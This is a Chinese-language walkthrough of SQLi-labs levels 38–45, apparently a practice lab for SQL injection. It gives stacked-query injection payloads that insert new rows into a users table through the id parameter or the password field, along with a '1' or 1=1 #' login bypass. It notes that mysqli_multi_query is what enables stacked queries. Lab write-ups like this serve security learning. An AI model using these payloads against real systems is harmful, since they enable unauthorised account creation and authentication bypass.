第三十八關(guān)

堆疊注入，單引號閉合。
可以用聯(lián)合查詢注入，

1.png

但是題目是堆疊注入所以用堆疊。向users表中插入一條用戶信息：
?id=1';insert into users(id,username,password) values (20,'d38','d38'); --+

2.png

查看users表：

3.png

之所以可以使用堆疊查詢是因為這里：

4.png

mysqli_multi_query() 函數(shù)執(zhí)行一個或多個針對數(shù)據(jù)庫的查詢。多個查詢用分號進行分隔。

第三十九關(guān)

堆疊注入，也可聯(lián)合注入，整數(shù)型。

第四十關(guān)

堆疊，也可聯(lián)合，單引號括號閉合。

第四十一關(guān)

堆疊，也可聯(lián)合，整數(shù)型。

5.png

第四十二關(guān)

利用堆疊注入加一條用戶信息，單引號閉合。我用hackbar試了半天不行，最后在頁面的文本框中寫的語句就可以了。這關(guān)要在密碼框?qū)慡QL語句，因為在源碼中看到，它會對提交的用戶名使用函數(shù)進行過濾，過濾掉特殊字符。

6.png

username：admin
password：1’;insert into users values(42,’d42’,’d42’);#

7.png

提交之后是錯誤頁面，點home返回，然后輸入我們剛才插入的賬號和密碼，發(fā)現(xiàn)成功登陸了。

8.png

除了使用堆疊注入，還可以使用萬能密碼登錄，同樣是在密碼框?qū)憇ql語句：
username：admin
password：1’ or 1=1 #

9.png

第四十三關(guān)

和42關(guān)思路一樣，利用堆疊注入加一條用戶信息，只不過這關(guān)是單引號括號閉合。
username：admin
password：1’);insert into users values(43,’d43’,’d43’);#

10.png

第四十四關(guān)

和第42關(guān)做法一模一樣，也是單引號閉合。
username：admin
password：1';insert into users values(44,'d44','d44');#

11.png

第四十五關(guān)

和43關(guān)一模一樣
username：admin
password：1');insert into users values(45,'d45','d45')#

12.png